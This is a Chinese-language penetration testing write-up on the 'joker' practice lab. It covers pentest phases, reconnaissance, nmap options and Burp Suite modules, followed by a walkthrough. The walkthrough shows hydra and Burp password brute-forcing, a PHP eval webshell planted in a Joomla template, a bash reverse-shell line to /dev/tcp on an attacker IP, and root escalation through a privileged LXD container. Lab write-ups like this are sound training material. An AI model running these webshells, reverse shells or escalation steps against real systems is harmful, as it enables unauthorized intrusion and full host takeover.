渗透测试——joker靶场漏洞复现
目录
- 理论
- 渗透测试流程以及每个阶段需要做的事情
- 信息收集需要收集的内容,以及收集的方式
- NMAP有哪些功能(写出参数)
- Burpsuite有哪些功能模块(详细说明)
- 实战
- 暴力破解得到反弹shell
- lxd提权
理论
渗透测试流程以及每个阶段需要做的事情
- 与客户确认测试范围——获得授权书——信息收集——漏洞挖掘——漏洞利用——后渗透——痕迹清除——生成渗透测试报告
- 项目启动:事先与客户沟通,测试事项、获得授权、保密协议测试对象和范围,测试环境,测试方式黑盒白盒灰盒, 是否包括破坏性测试
- 项目准备:编写测试方案,测试工具和应急预案,
- 测试实施:信息收集、脆弱性测试、问题验证、关联数据收集
- 测试汇报:测试数据、问题汇总、解决措施、测试报告、汇报PPT
信息收集需要收集的内容,以及收集的方式
信息收集的方式可以分为两种:主动和被动。
主动信息收集:通过直接访问、扫描网站,这种流量将流经网站
被动信息收集:利用第三方的服务对目标进行访问了解,比例:Google搜索、Shodan搜索等。
信息收集方式:扫描(端口扫描、漏洞扫描)、公开信息(搜索引擎、网站、论坛、媒体报道、微步社区、潮汐指纹、站长之家、子域名挖掘、备案号)、其他方式(钓鱼邮件、社工)
搜集的内容:
(1)端口
一个网站可能会开放多个不同的端口,而我们可以通过同一网站的不同端口进行测试,扫描开放端口的方法有很多,这里我分为两种:第一种在线端口扫描,第二种利用工具扫描端口。比较常见的在线端口扫描网站有:在线端口扫描,IP/服务器端口在线扫描-TooL.cc、在线端口检测,端口扫描,端口开放检查-在线工具-postjson等;端口扫描工具有nmap,goby等。(2)子域名
目标的子域是一个重要的测试点,你收集到的可用的子域名越多,意味着你的机会也就越多,所以说要尽可能的收集目标的子域名。子域名的收集方法有很多,这里我分为两种:第一种在线子域名收集。第二种利用工具进行子域名收集。比较常见的在线子域名搜索(爆破)的网站有:在线子域名爆破-子成君提供、在线子域名查询等;子域名扫描工具有oneforall、layer子域名挖掘机、SubDomainsBrute等。(3)C段旁注
当我们 对于目标主机无计可施时,我们可以尝试一下从C段或者旁注入手。C段入侵是拿下同一C段下的服务器,也就是说是D段1-255中的一台服务器,然后直接从被端掉的服务器出发进行其他测试;旁注的意思就是从同台服务器上的其他网站入手,提权,然后把服务器拿下了,就自然把那个网站拿下了。两者的区别:C段:同网段不同服务器,旁注:同服务器不同站点。C段旁注扫描:同IP网站查询,C段查询,IP反查域名,C段旁注,旁注工具(4)目录(敏感信息)
目录扫描也是一个渗透测试的重要点,如果你能从目录中找到一些敏感信息,那么你的渗透过程就会轻松很多。例如扫描出后台,源码,robots.txt的敏感目录或者敏感信息。目录扫描我分为两种:一种时在线目录扫描,一种是利用工具扫描目录。
在线目录扫描可以使用Google语法然后利用我们平时用的搜索引擎(搜狗,百度,bing,Google等)进行搜索。
NMAP有哪些功能(写出参数)
nmap -sn -T4 192.168.8.0/24
//-sn扫描这个网段的IP -T设置扫描速度级别最大为5最快nmap -A 192.168.8.156
// -A是完全扫描-v 输出扫描过程
- -sV 扫描系统和服务版本
- -O 扫描操作系统版本
- –version-light做轻量级扫描
- -sS syn半开放扫描
- -sU UDP 扫描
- -p 指定端口范围,默认扫描1000个端口
- -Pn不做ping扫描
- -sn只做ping扫描,不做端口扫描
- -F fast模式,只扫描常见服务端口,比默认端口少
Burpsuite有哪些功能模块(详细说明)
- 1.
Target(目标)
——显示目标目录结构的的一个功能 - 2.
Proxy(代理)
——拦截HTTP/S的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。 - 3.
Spider(蜘蛛)
——应用智能感应的网络爬虫,它能完整的枚举应用程序的内容和功能。 - 4.
Scanner(扫描器)
——高级工具,执行后,它能自动地发现web 应用程序的安全漏洞。 - 5.
Intruder(入侵)
——一个定制的高度可配置的工具,对web应用程序进行自动化攻击,如:枚举标识符,收集有用的数据,以及使用fuzzing 技术探测常规漏洞。 - 6.
Repeater(中继器)
——一个靠手动操作来触发单独的HTTP 请求,并分析应用程序响应的工具。 - 7.
Sequencer(会话)
——用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具。 - 8.
Decoder(解码器)
——进行手动执行或对应用程序数据者智能解码编码的工具。 - 9.
Comparer(对比)
——通常是通过一些相关的请求和响应得到两项数据的一个可视化的“差异”。 - 10.
Extender(扩展)
——可以让你加载Burp Suite的扩展,使用你自己的或第三方代码来扩展Burp Suit的功能。 - 11.
Options(设置)
——对Burp Suite的一些设置。
实战
暴力破解得到反弹shell
首先利用nmap扫描网段,判断靶机的IP
nmap -sn 192.168.8.0/24
找到IP后,继续扫描其开放端口,有22(ssh)、80、8080可以尝试用hydra进行ssh爆破(实测不行,需要有强大的字典)
nmap -A -T4 192.168.8.156
利用hydra进行ssh爆破
hydra -l joker -P /root/fwq.txt -t 6 ssh://192.168.8.156
dirb http://192.168.8.156/
探测该网站下的文件目录名,登录查看只是网站的源码和图片算低危的信息泄露
可以使用御剑进行扫描
8080端口也开放,尝试利用burp抓包进行用户名密码的爆破
利用burp和kali中的rock密码字典进行密码爆破
得到正确密码为hannah
登陆成功可以发现该网站是由joomla架构,尝试使用默认账号密码joomla
可以看到这是他网站的一些模板
新建111.php写入木马,利用菜刀或者蚁剑进行链接
<?php @eval($_POST['yyy']); ?>
也可以双击打开终端
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.8.144/7777 0>&1'");?>
或者写入反弹shell
kali开启监听,访问我们写的yyshell.php文件
lxd提权
想要提升为root权限,我们需要给靶机挂载一个lxd镜像。可以在kali或者自己的服务器上从github下载build-alpine文件,然后执行build-alpine这个shell脚本。“build-alpine”,将以压缩文件的形式构建最新的Alpine镜像,最后我们需要在靶机中下载这个镜像
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
生成一个tar.gz文件切换到tmp目录下
上传镜像
python -m SimpleHTTPServer
wget http://192.168.8.144:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
靶机切换到tmp下执行
依次运行命令
lxc init joker ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
提权成功,进入容器之后,定位到/mnt/root即可查看目标主机资源,即可查看final.txt
渗透测试——joker靶场漏洞复现相关推荐
- Windows网络服务渗透测试实战MS17-010漏洞复现
一.实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现 二.实验目的及要求 熟悉Metasploit终端的使用方法: 掌握对MS17-010漏洞攻击的方法. 三.复现步骤(附加文 ...
- VulnHub渗透测试实战靶场 - Odin:1
VulnHub渗透测试实战靶场 - Odin:1 题目描述 环境下载 NULLY CYBERSECURITY: 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 题目描述 Odin v ...
- VulnHub渗透测试实战靶场 - POTATO (SUNCSR): 1
VulnHub渗透测试实战靶场 - POTATO(SUNCSR): 1 环境下载 POTATO (SUNCSR): 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 环境下载 戳此进行 ...
- VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE 环境下载 THE ETHER: EVILSCIENCE靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 ...
- 渗透测试工具--Nessue漏洞扫描与分析软件
渗透测试工具–Nessue漏洞扫描与分析软件 一.简介&特色: Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件.总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系 ...
- VulnHub渗透测试实战靶场-HA: FORENSICS
VulnHub渗透测试实战靶场-HA: FORENSICS 题目描述 环境下载 HA: FORENSICS靶机搭建 渗透测试 信息搜集 Flag获取 Flag-1 Flag-2 Flag-3 Flag ...
- 渗透测试php靶场,渗透测试靶场初体验
声明本文仅供学习和研究,由于传播.利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,海青实验室及文章作者不承担任何责任. 安全狗海青实验室拥有此文章的修改和解释权,如欲转载 ...
- web渗透测试 靶机系统 漏洞测试环境
本文总结了目前网络上比较流行的渗透测试演练系统,这些系统里面都提供了一些实际的安全漏洞,排名不分先后,各位安全测试人员可以亲身实践如何利用这个漏洞,同时也可以学习到漏洞的相关知识. DVWA (Dam ...
- 渗透测试安全检测漏洞
最近渗透测试工作比较多没有空闲的时间来写文章,今天由我们Sine安全的渗透主管来普及一下java的安全测试基础,很多客户想要了解具体js的调用漏洞或提交playload的过程以及是如何拿到最高权限和绕 ...
最新文章
- L2TPV3---以太网端口到端口手动配置
- openssl 创建私有CA
- Servlet--HttpServletRequest一些不常用的方法
- 源码安装mysql主从_mysql源码安装和主从同步配置
- IPhone鸿蒙系统,iPhone 13外观再次确认,鸿蒙系统也将临世,神仙又打架
- 如何从ngrx-store-devtools.js里找到actions的触发源头
- java 获取六个月账期,应收帐龄分析里面账期分析能不能改为0-30天?
- 风格迁移模型测试效果
- POJ 2492 A Bug's Life (带权并查集 向量偏移)
- php面向对象特性(一)
- KVO 的使用和举例
- STM32点阵静态显示汉字
- html渐变显示动画效果,css3实现背景动态渐变效果
- lpx寒假作业案例3
- 手机和电脑传输文件又有了新选择
- 1、学生如何购买云服务器、域名(系列:个人博客搭建)
- 2021最新《python爬虫从0-1》5.正则表达式讲解
- Ac4GlcNAz,98924-81-3,N-乙酰葡糖胺叠氮基,可以进行糖化学修饰
- 生鲜配送企业如何高效管理订单,为企业降本增效?
- linux 行首加特定字符_linux shell 用sed命令在文本的行尾或行首添加字符
热门文章
- 【数据挖掘】任务4:20Newsgroups聚类
- php最大公约数辗转相除程序,[转]辗转相除求最大公约数
- 微信公众号生成个性化菜单
- oracle fx成立时间,oracle 日期格式FM/FX和日期后缀SP/TH/SPTH/THSP
- HDU 2977 Color Squares BFS
- 双栈路由Linux,IPV6 IPV4双栈互通与静态路由
- 11选5c语言代码,和山山哥一起学EXCEL和VBA,学以致用搞彩票11选5(一)
- uboot的环境变量
- 解决Win10频繁禁用IME的问题
- 速取,3D建模速成入门到高级教程(附软件安装包)